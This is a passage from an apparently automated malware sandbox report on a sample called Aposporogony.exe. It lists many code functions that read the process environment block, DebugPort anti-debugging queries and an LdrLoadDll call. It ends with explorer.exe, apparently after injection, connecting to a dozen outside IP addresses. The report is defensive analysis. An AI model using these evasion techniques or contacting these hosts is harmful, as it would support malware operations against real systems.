      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D6E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D6E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D6E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D6E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov ecx, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D5E30 mov eax, dword ptr fs:[00000030h]4_2_1D8D5E30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83AE40 mov eax, dword ptr fs:[00000030h]4_2_1D83AE40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83AE40 mov eax, dword ptr fs:[00000030h]4_2_1D83AE40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83AE40 mov eax, dword ptr fs:[00000030h]4_2_1D83AE40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83FE40 mov eax, dword ptr fs:[00000030h]4_2_1D83FE40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83DE45 mov eax, dword ptr fs:[00000030h]4_2_1D83DE45
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83DE45 mov ecx, dword ptr fs:[00000030h]4_2_1D83DE45
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86EE48 mov eax, dword ptr fs:[00000030h]4_2_1D86EE48
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BDE50 mov eax, dword ptr fs:[00000030h]4_2_1D8BDE50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BDE50 mov eax, dword ptr fs:[00000030h]4_2_1D8BDE50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BDE50 mov ecx, dword ptr fs:[00000030h]4_2_1D8BDE50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BDE50 mov eax, dword ptr fs:[00000030h]4_2_1D8BDE50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BDE50 mov eax, dword ptr fs:[00000030h]4_2_1D8BDE50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83BE60 mov eax, dword ptr fs:[00000030h]4_2_1D83BE60
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83BE60 mov eax, dword ptr fs:[00000030h]4_2_1D83BE60
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914E62 mov eax, dword ptr fs:[00000030h]4_2_1D914E62
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D841E70 mov eax, dword ptr fs:[00000030h]4_2_1D841E70
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D877E71 mov eax, dword ptr fs:[00000030h]4_2_1D877E71
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CE70 mov eax, dword ptr fs:[00000030h]4_2_1D87CE70
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C98F mov eax, dword ptr fs:[00000030h]4_2_1D87C98F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C98F mov eax, dword ptr fs:[00000030h]4_2_1D87C98F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C98F mov eax, dword ptr fs:[00000030h]4_2_1D87C98F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A0 mov eax, dword ptr fs:[00000030h]4_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CF9AA mov eax, dword ptr fs:[00000030h]4_2_1D8CF9AA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CF9AA mov eax, dword ptr fs:[00000030h]4_2_1D8CF9AA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C89A0 mov eax, dword ptr fs:[00000030h]4_2_1D8C89A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83B9B0 mov eax, dword ptr fs:[00000030h]4_2_1D83B9B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8789B0 mov edx, dword ptr fs:[00000030h]4_2_1D8789B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B9C0 mov eax, dword ptr fs:[00000030h]4_2_1D84B9C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B9C0 mov eax, dword ptr fs:[00000030h]4_2_1D84B9C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8489C0 mov eax, dword ptr fs:[00000030h]4_2_1D8489C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8489C0 mov eax, dword ptr fs:[00000030h]4_2_1D8489C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86D9CE mov eax, dword ptr fs:[00000030h]4_2_1D86D9CE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FD9C6 mov eax, dword ptr fs:[00000030h]4_2_1D8FD9C6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CD9C7 mov eax, dword ptr fs:[00000030h]4_2_1D8CD9C7
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E99D6 mov ecx, dword ptr fs:[00000030h]4_2_1D8E99D6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9129CF mov eax, dword ptr fs:[00000030h]4_2_1D9129CF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9129CF mov eax, dword ptr fs:[00000030h]4_2_1D9129CF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8399F0 mov ecx, dword ptr fs:[00000030h]4_2_1D8399F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8409F0 mov eax, dword ptr fs:[00000030h]4_2_1D8409F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8749F0 mov eax, dword ptr fs:[00000030h]4_2_1D8749F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8749F0 mov eax, dword ptr fs:[00000030h]4_2_1D8749F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86B9FA mov eax, dword ptr fs:[00000030h]4_2_1D86B9FA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837917 mov eax, dword ptr fs:[00000030h]4_2_1D837917
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D896912 mov eax, dword ptr fs:[00000030h]4_2_1D896912
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872919 mov eax, dword ptr fs:[00000030h]4_2_1D872919
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872919 mov eax, dword ptr fs:[00000030h]4_2_1D872919
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D875921 mov eax, dword ptr fs:[00000030h]4_2_1D875921
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D875921 mov ecx, dword ptr fs:[00000030h]4_2_1D875921
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D875921 mov eax, dword ptr fs:[00000030h]4_2_1D875921
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D875921 mov eax, dword ptr fs:[00000030h]4_2_1D875921
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BC920 mov ecx, dword ptr fs:[00000030h]4_2_1D8BC920
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BC920 mov eax, dword ptr fs:[00000030h]4_2_1D8BC920
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BC920 mov eax, dword ptr fs:[00000030h]4_2_1D8BC920
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BC920 mov eax, dword ptr fs:[00000030h]4_2_1D8BC920
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83B931 mov eax, dword ptr fs:[00000030h]4_2_1D83B931
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83B931 mov eax, dword ptr fs:[00000030h]4_2_1D83B931
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D89693A mov eax, dword ptr fs:[00000030h]4_2_1D89693A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D89693A mov eax, dword ptr fs:[00000030h]4_2_1D89693A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D89693A mov eax, dword ptr fs:[00000030h]4_2_1D89693A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D91492D mov eax, dword ptr fs:[00000030h]4_2_1D91492D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D869938 mov ecx, dword ptr fs:[00000030h]4_2_1D869938
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90892E mov eax, dword ptr fs:[00000030h]4_2_1D90892E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90892E mov eax, dword ptr fs:[00000030h]4_2_1D90892E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C944 mov eax, dword ptr fs:[00000030h]4_2_1D87C944
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86D940 mov eax, dword ptr fs:[00000030h]4_2_1D86D940
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86D940 mov eax, dword ptr fs:[00000030h]4_2_1D86D940
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86E94E mov eax, dword ptr fs:[00000030h]4_2_1D86E94E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D864955 mov eax, dword ptr fs:[00000030h]4_2_1D864955
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D864955 mov eax, dword ptr fs:[00000030h]4_2_1D864955
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov eax, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov ecx, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov eax, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov eax, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov eax, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84B950 mov eax, dword ptr fs:[00000030h]4_2_1D84B950
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90D946 mov eax, dword ptr fs:[00000030h]4_2_1D90D946
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C395B mov eax, dword ptr fs:[00000030h]4_2_1D8C395B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C395B mov eax, dword ptr fs:[00000030h]4_2_1D8C395B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C395B mov eax, dword ptr fs:[00000030h]4_2_1D8C395B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C958 mov eax, dword ptr fs:[00000030h]4_2_1D87C958
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85096B mov eax, dword ptr fs:[00000030h]4_2_1D85096B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85096B mov eax, dword ptr fs:[00000030h]4_2_1D85096B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C488F mov eax, dword ptr fs:[00000030h]4_2_1D8C488F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D867882 mov eax, dword ptr fs:[00000030h]4_2_1D867882
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D866882 mov eax, dword ptr fs:[00000030h]4_2_1D866882
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D866882 mov eax, dword ptr fs:[00000030h]4_2_1D866882
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D866882 mov eax, dword ptr fs:[00000030h]4_2_1D866882
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D88088E mov eax, dword ptr fs:[00000030h]4_2_1D88088E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D88088E mov edx, dword ptr fs:[00000030h]4_2_1D88088E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D88088E mov eax, dword ptr fs:[00000030h]4_2_1D88088E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E1889 mov eax, dword ptr fs:[00000030h]4_2_1D8E1889
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E1889 mov eax, dword ptr fs:[00000030h]4_2_1D8E1889
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E1889 mov eax, dword ptr fs:[00000030h]4_2_1D8E1889
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87188E mov eax, dword ptr fs:[00000030h]4_2_1D87188E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87188E mov eax, dword ptr fs:[00000030h]4_2_1D87188E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87B890 mov eax, dword ptr fs:[00000030h]4_2_1D87B890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87B890 mov eax, dword ptr fs:[00000030h]4_2_1D87B890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87B890 mov eax, dword ptr fs:[00000030h]4_2_1D87B890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CB890 mov eax, dword ptr fs:[00000030h]4_2_1D8CB890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CB890 mov eax, dword ptr fs:[00000030h]4_2_1D8CB890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CB890 mov ecx, dword ptr fs:[00000030h]4_2_1D8CB890
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86D898 mov eax, dword ptr fs:[00000030h]4_2_1D86D898
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F8B0 mov eax, dword ptr fs:[00000030h]4_2_1D83F8B0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C98B2 mov eax, dword ptr fs:[00000030h]4_2_1D8C98B2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C0 mov eax, dword ptr fs:[00000030h]4_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8408CD mov eax, dword ptr fs:[00000030h]4_2_1D8408CD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8408CD mov eax, dword ptr fs:[00000030h]4_2_1D8408CD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9018DA mov eax, dword ptr fs:[00000030h]4_2_1D9018DA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9018DA mov eax, dword ptr fs:[00000030h]4_2_1D9018DA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9018DA mov eax, dword ptr fs:[00000030h]4_2_1D9018DA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9018DA mov eax, dword ptr fs:[00000030h]4_2_1D9018DA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8388C8 mov eax, dword ptr fs:[00000030h]4_2_1D8388C8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8388C8 mov eax, dword ptr fs:[00000030h]4_2_1D8388C8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8498DE mov eax, dword ptr fs:[00000030h]4_2_1D8498DE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8378E1 mov eax, dword ptr fs:[00000030h]4_2_1D8378E1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8458E0 mov eax, dword ptr fs:[00000030h]4_2_1D8458E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8458E0 mov eax, dword ptr fs:[00000030h]4_2_1D8458E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8458E0 mov eax, dword ptr fs:[00000030h]4_2_1D8458E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8458E0 mov eax, dword ptr fs:[00000030h]4_2_1D8458E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84A8F0 mov eax, dword ptr fs:[00000030h]4_2_1D84A8F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8748F0 mov eax, dword ptr fs:[00000030h]4_2_1D8748F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83D800 mov eax, dword ptr fs:[00000030h]4_2_1D83D800
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D853800 mov eax, dword ptr fs:[00000030h]4_2_1D853800
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D853800 mov eax, dword ptr fs:[00000030h]4_2_1D853800
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D853800 mov eax, dword ptr fs:[00000030h]4_2_1D853800
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83D818 mov eax, dword ptr fs:[00000030h]4_2_1D83D818
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C819 mov eax, dword ptr fs:[00000030h]4_2_1D87C819
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87C819 mov eax, dword ptr fs:[00000030h]4_2_1D87C819
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FF82B mov eax, dword ptr fs:[00000030h]4_2_1D8FF82B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86B839 mov eax, dword ptr fs:[00000030h]4_2_1D86B839
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CF85C mov eax, dword ptr fs:[00000030h]4_2_1D8CF85C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CF85C mov eax, dword ptr fs:[00000030h]4_2_1D8CF85C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CF85C mov eax, dword ptr fs:[00000030h]4_2_1D8CF85C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EF85F mov eax, dword ptr fs:[00000030h]4_2_1D8EF85F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EF85F mov eax, dword ptr fs:[00000030h]4_2_1D8EF85F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EF85F mov eax, dword ptr fs:[00000030h]4_2_1D8EF85F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84F870 mov eax, dword ptr fs:[00000030h]4_2_1D84F870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84F870 mov eax, dword ptr fs:[00000030h]4_2_1D84F870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D859870 mov eax, dword ptr fs:[00000030h]4_2_1D859870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D859870 mov eax, dword ptr fs:[00000030h]4_2_1D859870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CC870 mov eax, dword ptr fs:[00000030h]4_2_1D8CC870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851B80 mov eax, dword ptr fs:[00000030h]4_2_1D851B80
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A20A1 LdrLoadDll,0_2_034A20A1

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 154.204.24.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.185.32.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.245.148.189 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 96.43.100.185 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.232.217.125 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.151.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.15.214 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.33.23.183 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.24 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.101.158.239 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.13.90.76 80Jump to behavior
